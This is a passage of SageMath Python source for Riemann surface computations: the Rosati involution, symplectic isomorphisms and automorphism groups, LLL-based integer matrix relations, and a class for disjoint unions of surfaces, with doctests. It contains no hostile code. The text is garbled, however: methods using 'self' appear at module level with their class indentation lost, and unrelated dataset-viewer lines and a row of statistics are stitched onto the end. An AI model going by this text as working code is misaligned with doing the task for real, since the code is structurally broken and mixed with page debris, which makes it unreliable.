        epscomp = 2**(-self._prec + 30)
    QQalg = QQ.algebraic_closure()

    def polynomialize_element(alpha):
        # Try candidate minimal polynomials of increasing degree; the
        # height bound must grow with the degree.  NB: this must be
        # ``10**d`` (exponentiation); the earlier ``10^d`` is bitwise XOR
        # in a plain Python file and kept the bound spuriously tiny.
        d = 1
        while True:
            d += 1
            dep = algdep(alpha, d, height_bound=10**d)
            if dep and dep(alpha) < epscomp:
                return dep

    def algebraize_element(alpha):
        # Match alpha against the roots of its candidate polynomial in
        # QQbar, within the numerical tolerance epscomp.
        alphaPol = polynomialize_element(alpha)
        CC = alpha.parent()
        for tup in alphaPol.roots(QQalg):
            rt = tup[0]
            if (alpha - CC(rt)).abs() < epscomp:
                return rt
        raise AssertionError('No close root found while algebraizing')

    def algebraize_matrices(Ts):
        # Algebraize entrywise, then put all entries in one common number
        # field so the returned matrices share a base ring.
        nr = Ts[0].nrows()
        nc = Ts[0].ncols()
        rr = range(nr)
        rc = range(nc)
        TsAlg = []
        for T in Ts:
            TAlg = Matrix([[algebraize_element(T[i, j]) for j in rc]
                           for i in rr])
            TsAlg.append(TAlg)
        elts = [x for TAl in TsAlg for x in TAl.list()]
        eltsAlg = number_field_elements_from_algebraics(elts)[1]
        L = eltsAlg[0].parent()
        TsAlgL = []
        for i in range(len(Ts)):
            TAlgL = [eltsAlg[j] for j in range(i*nr*nc, (i + 1)*nr*nc)]
            TsAlgL.append(Matrix(L, nr, nc, TAlgL))
        return TsAlgL

    Ts = self.tangent_representation_numerical(Rs, other=other)
    return algebraize_matrices(Ts)
def rosati_involution(self, R):
    r"""
    Computes the Rosati involution of an endomorphism.

    The endomorphism in question should be given by its homology
    representation with respect to the symplectic basis of the Jacobian.

    INPUT:

    - ``R`` -- integral matrix.

    OUTPUT:

    The result of applying the Rosati involution to ``R``.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: A.<x,y> = QQ[]
        sage: S = RiemannSurface(y^2 - (x^6 + 2*x^4 + 4*x^2 + 8), prec = 100)
        sage: Rs = S.endomorphism_basis()
        sage: S.rosati_involution(S.rosati_involution(Rs[1])) == Rs[1]
        True
    """
    g = self.genus
    if len(R.rows()) != 2*g or len(R.columns()) != 2*g:
        raise AssertionError("Matrix is not the homology representation of an endomorphism")
    # Standard symplectic form J of size 2g x 2g; the Rosati involution
    # is conjugation of the transpose by J (up to sign).
    identity_block = matrix.identity(g)
    zero_block = matrix.zero(g)
    J = matrix.block([[zero_block, -identity_block],
                      [identity_block, zero_block]])
    return -J * R.transpose() * J
def symplectic_isomorphisms(self, other = None, hom_basis = None, b = None, r = None):
    r"""
    Numerically compute symplectic isomorphisms.

    INPUT:

    - ``other`` (default: ``self``) -- the codomain, another Riemann
      surface.

    - ``hom_basis`` (default: ``None``) -- a `\ZZ`-basis of the
      homomorphisms from ``self`` to ``other``, as obtained from
      :meth:`homomorphism_basis`. If you have already calculated this
      basis, it saves time to pass it via this keyword argument. Otherwise
      the method will calculate it.

    - ``b`` -- integer (default provided): as for
      :meth:`homomorphism_basis`, and used in its invocation if
      (re)calculating said basis.

    - ``r`` -- integer (default: ``b/4``). as for
      :meth:`homomorphism_basis`, and used in its invocation if
      (re)calculating said basis.

    OUTPUT:

    Returns the combinations of the elements of :meth:`homomorphism_basis`
    that correspond to symplectic isomorphisms between the Jacobians of
    ``self`` and ``other``.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: R.<x,y> = QQ[]
        sage: f = y^2 - (x^6 + 2*x^4 + 4*x^2 + 8)
        sage: X = RiemannSurface(f, prec = 100)
        sage: P = X.period_matrix()
        sage: g = y^2 - (x^6 + x^4 + x^2 + 1)
        sage: Y = RiemannSurface(g, prec = 100)
        sage: Q = Y.period_matrix()
        sage: Rs = X.symplectic_isomorphisms(Y)
        sage: Ts = X.tangent_representation_numerical(Rs, other = Y)
        sage: test1 = all(((T*P - Q*R).norm() < 2^(-80)) for [T, R] in zip(Ts, Rs))
        sage: test2 = all(det(R) == 1 for R in Rs)
        sage: test1 and test2
        True
    """
    if not other:
        other = self
    if hom_basis:
        Rs = hom_basis
    else:
        Rs = self.homomorphism_basis(other = other, b = b, r = r)
    r = len(Rs)
    g = self.genus
    # Generic element of the homomorphism module, with indeterminate
    # integer coefficients x_i.
    A = PolynomialRing(QQ, r, 'x')
    gensA = A.gens()
    # Use that the trace is positive definite; we could also put this as an
    # extra condition when determining the endomorphism basis to speed up
    # that calculation slightly
    R = sum( gensA[i]*Rs[i].change_ring(A) for i in range(r) )
    tr = (R*self.rosati_involution(R)).trace()
    # Condition tr = 2 g creates ellipsoid
    # Gram matrix of the (quadratic) trace form, recovered via second
    # partial derivatives.
    M = Matrix(ZZ, r, r, [ tr.derivative(gen1).derivative(gen2)
                           for gen1 in gensA for gen2 in gensA ])
    # PARI's qfminim enumerates the short vectors of the ellipsoid
    # tr <= 4g; qfminim returns vectors only up to sign, hence the
    # explicit addition of the negatives below.
    vs = M.__pari__().qfminim(4*g)[2].sage().transpose()
    vs = [ v for v in vs if v * M * v == 4*g ]
    vs += [ -v for v in vs ]
    RsIso = [ ]
    for v in vs:
        R = sum( v[i]*Rs[i] for i in range(r) )
        # Keep exactly those combinations that are symplectic units:
        # R composed with its Rosati involution is the identity.
        if R*self.rosati_involution(R) == 1:
            RsIso.append(R)
    return RsIso
def symplectic_automorphism_group(self, endo_basis = None, b = None, r = None):
    r"""
    Numerically compute the symplectic automorphism group as a permutation
    group.

    INPUT:

    - ``endo_basis`` (default: ``None``) -- a `\ZZ`-basis of the
      endomorphisms of ``self``, as obtained from
      :meth:`endomorphism_basis`. If you have already calculated this
      basis, it saves time to pass it via this keyword argument. Otherwise
      the method will calculate it.

    - ``b`` -- integer (default provided): as for
      :meth:`homomorphism_basis`, and used in its invocation if
      (re)calculating said basis.

    - ``r`` -- integer (default: ``b/4``). as for
      :meth:`homomorphism_basis`, and used in its invocation if
      (re)calculating said basis.

    OUTPUT:

    The symplectic automorphism group of the Jacobian of the Riemann
    surface. The automorphism group of the Riemann surface itself can be
    recovered from this; if the curve is hyperelliptic, then it is
    identical, and if not, then one divides out by the central element
    corresponding to multiplication by -1.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
        sage: A.<x,y> = QQ[]
        sage: S = RiemannSurface(y^2 - (x^6 + 2*x^4 + 4*x^2 + 8), prec = 100)
        sage: G = S.symplectic_automorphism_group()
        sage: G.as_permutation_group().is_isomorphic(DihedralGroup(4))
        True
    """
    # Automorphisms are the symplectic self-isomorphisms; package them as
    # a matrix group.
    units = self.symplectic_isomorphisms(hom_basis=endo_basis, b=b, r=r)
    return MatrixGroup(units)
def __add__(self,other):
    r"""
    Return the disjoint union of the Riemann surface and the other argument.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
        sage: R.<x,y>=QQ[]
        sage: S1 = RiemannSurface(y^2-x^3-x-1)
        sage: S1+S1
        Riemann surface sum with period lattice of rank 4
    """
    # The disjoint union corresponds to the direct product of the analytic
    # Jacobians, which RiemannSurfaceSum models.
    return RiemannSurfaceSum([self,other])
def integer_matrix_relations(M1,M2,b=None,r=None):
    r"""
    Determine integer relations between complex matrices.

    Given two square matrices with complex entries of size g, h respectively,
    numerically determine an (approximate) ZZ-basis for the 2g x 2h matrices
    with integer entries of the shape (D, B; C, A) such that B+M1*A=(D+M1*C)*M2.
    By considering real and imaginary parts separately we obtain `2gh` equations
    with real coefficients in `4gh` variables. We scale the coefficients by a
    constant `2^b` and round them to integers, in order to obtain an integer
    system of equations. Standard application of LLL allows us to determine near
    solutions.

    The user can specify the parameter `b`, but by default the system will
    choose a `b` based on the size of the coefficients and the precision with
    which they are given.

    INPUT:

    - ``M1`` -- square complex valued matrix

    - ``M2`` -- square complex valued matrix of same size as M1

    - ``b`` -- integer (default provided). The equation coefficients are scaled
      by `2^b` before rounding to integers.

    - ``r`` -- integer (default: ``b/4``). The vectors found by LLL that satisfy
      the scaled equations to withing `2^r` are reported as solutions.

    OUTPUT:

    A list of 2g x 2h integer matrices that, for large enough `r`, `b-r`,
    generate the ZZ-module of relevant transformations.

    EXAMPLES::

        sage: from sage.schemes.riemann_surfaces.riemann_surface import integer_matrix_relations
        sage: M1=M2=matrix(CC,2,2,[sqrt(d) for d in [2,-3,-3,-6]])
        sage: T=integer_matrix_relations(M1,M2)
        sage: id=parent(M1)(1)
        sage: M1t=[id.augment(M1) * t for t in T]
        sage: [((m[:,:2]^(-1)*m)[:,2:]-M2).norm() < 1e-13 for m in M1t]
        [True, True]
    """
    if not(M1.ncols()==M1.nrows() and M2.ncols()==M2.nrows()):
        raise ValueError("matrices need to be square")
    prec = min(M1.base_ring().precision(),M2.base_ring().precision())
    # H bounds the magnitude of the matrix entries; it determines how much
    # the coefficients can be scaled without exceeding the precision.
    H = max(max( abs(m.real_part()) for m in M1.list()+M2.list()), max( abs(m.imag_part()) for m in M1.list()+M2.list()))
    if b is None:
        b = prec-5-H.log2().floor()
    if r is None:
        r = b//4
    S = 2**b
    if H*S > 2**(prec-4):
        raise ValueError("insufficient precision for b=%s"%b)
    g1 = M1.ncols()
    g2 = M2.ncols()
    # Work over the lower-precision base ring of the two.
    CC = M1.base_ring() if (M1.base_ring().precision() <= M2.base_ring().precision()) else M2.base_ring()
    V = ["%s%s"%(n,i) for n in ["a","b","c","d"] for i in srange(1,1+g1*g2)]
    R = PolynomialRing(CC,V)
    vars = R.gens()
    A = Matrix(R, g1, g2, vars[:g1*g2])
    B = Matrix(R, g1, g2, vars[g1*g2:2*g1*g2])
    C = Matrix(R, g1, g2, vars[2*g1*g2:3*g1*g2])
    D = Matrix(R, g1, g2, vars[3*g1*g2:4*g1*g2])
    # Linear forms (in the integer unknowns) that must vanish.
    W = ((M1*A+B) - (M1*C+D)*M2).list()
    # (The original code re-bound ``vars = R.gens()`` here a second time;
    # that duplicate dead assignment has been removed.)
    # Lattice whose short vectors encode near-solutions: identity block to
    # keep track of the coefficients, followed by the scaled and rounded
    # real and imaginary parts of the equations.
    mt = Matrix(ZZ,[[1 if i==j else 0 for j in range(4*g1*g2)] +
                    [(S*w.monomial_coefficient(vars[i]).real_part()).round() for w in W] +
                    [(S*w.monomial_coefficient(vars[i]).imag_part()).round() for w in W] for i in range(len(vars))])
    # we compute an LLL-reduced basis of this lattice:
    mtL = mt.LLL()
    def vectomat(v):
        # Reassemble a lattice vector into the block matrix (D, B; C, A).
        A = Matrix(g1,g2,v[:g1*g2].list())
        B = Matrix(g1,g2,v[g1*g2:2*g1*g2].list())
        C = Matrix(g1,g2,v[2*g1*g2:3*g1*g2].list())
        D = Matrix(g1,g2,v[3*g1*g2:4*g1*g2].list())
        return D.augment(B).stack(C.augment(A))
    c = 2**r
    # Keep only the vectors whose equation residues are small enough.
    return [vectomat(v) for v in mtL if all(a.abs() <= c for a in v[g1*g2:])]
class RiemannSurfaceSum(RiemannSurface):
    r"""
    Represent the disjoint union of finitely many Riemann surfaces.

    Rudimentary class to represent disjoint unions of Riemann surfaces. Exists
    mainly (and this is the only functionality actually implemented) to
    represents direct products of the complex tori that arise as analytic
    Jacobians of Riemann surfaces.

    INPUT:

    - L -- list of RiemannSurface objects

    EXAMPLES::

        sage: _.<x> = QQ[]
        sage: SC = HyperellipticCurve(x^6-2*x^4+3*x^2-7).riemann_surface(prec=60)
        sage: S1 = HyperellipticCurve(x^3-2*x^2+3*x-7).riemann_surface(prec=60)
        sage: S2 = HyperellipticCurve(1-2*x+3*x^2-7*x^3).riemann_surface(prec=60)
        sage: len(SC.homomorphism_basis(S1+S2))
        2
    """
    def __init__(self,L):
        r"""
        TESTS::

            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
            sage: R.<x,y>=QQ[]
            sage: S1 = RiemannSurface(y^2-x^3-x-1)
            sage: S2 = RiemannSurface(y^2-x^3-x-5)
            sage: S = RiemannSurfaceSum([S1,S2])
            sage: S.riemann_matrix() == S1.riemann_matrix().block_sum(S2.riemann_matrix())
            True
        """
        if not all(isinstance(l,RiemannSurface) for l in L):
            raise ValueError("summands must be RiemannSurface objects")
        # The sum can only be as precise as its least precise summand.
        prec = min(l._prec for l in L)
        self._prec = prec
        self.genus = sum(s.genus for s in L)
        # Accumulate the block sums of the left halves (PM1), right halves
        # (PM2) and Riemann matrices of the summands, seeded by the first
        # summand.  Splitting each period matrix in halves first keeps the
        # combined matrix in (A | B) form.
        it = iter(L)
        s = next(it)
        g = s.genus
        PM = s.period_matrix()
        PM1 = PM[:g,:g]
        PM2 = PM[:g,g:2*g]
        tau = s.riemann_matrix()
        for s in it:
            g = s.genus
            PM = s.period_matrix()
            PM1 = PM1.block_sum(PM[:g,:g])
            PM2 = PM2.block_sum(PM[:g,g:2*g])
            tau = tau.block_sum(s.riemann_matrix())
        self.PM = block_matrix([[PM1, PM2]], subdivide = False)
        self.tau = tau
    def period_matrix(self):
        r"""
        Return the period matrix of the surface.

        This is just the diagonal block matrix constructed from the period
        matrices of the constituents.

        EXAMPLES::

            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
            sage: R.<x,y>=QQ[]
            sage: S1 = RiemannSurface(y^2-x^3-x-1)
            sage: S2 = RiemannSurface(y^2-x^3-x-5)
            sage: S = RiemannSurfaceSum([S1,S2])
            sage: S1S2 = S1.period_matrix().block_sum(S2.period_matrix())
            sage: S.period_matrix() == S1S2[[0,1],[0,2,1,3]]
            True
        """
        return self.PM
    def riemann_matrix(self):
        r"""
        Return the normalized period matrix of the surface.

        This is just the diagonal block matrix constructed from the Riemann
        matrices of the constituents.

        EXAMPLES::

            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
            sage: R.<x,y>=QQ[]
            sage: S1 = RiemannSurface(y^2-x^3-x-1)
            sage: S2 = RiemannSurface(y^2-x^3-x-5)
            sage: S = RiemannSurfaceSum([S1,S2])
            sage: S.riemann_matrix() == S1.riemann_matrix().block_sum(S2.riemann_matrix())
            True
        """
        return self.tau
    def __repr__(self):
        r"""
        Return string describing Riemann surface sum.

        EXAMPLES::

            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
            sage: R.<x,y>=QQ[]
            sage: S1 = RiemannSurface(y^2-x^3-x-1)
            sage: S2 = RiemannSurface(y^2-x^3-x-5)
            sage: RiemannSurfaceSum([S1,S2])
            Riemann surface sum with period lattice of rank 4
        """
        return "Riemann surface sum with period lattice of rank " + repr(2*self.genus)
    def __add__(self,other):
        r"""
        Return the disjoint union of the Riemann surface and the other argument.

        EXAMPLES::

            sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface, RiemannSurfaceSum
            sage: R.<x,y>=QQ[]
            sage: S1 = RiemannSurface(y^2-x^3-x-1)
            sage: S1+S1+S1
            Riemann surface sum with period lattice of rank 6
        """
        # Note: this flattens into a new two-element sum whose first summand
        # is itself a sum, rather than re-decomposing into all constituents.
        return RiemannSurfaceSum([self, other])
| 39.610619 | 123 | 0.575983 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.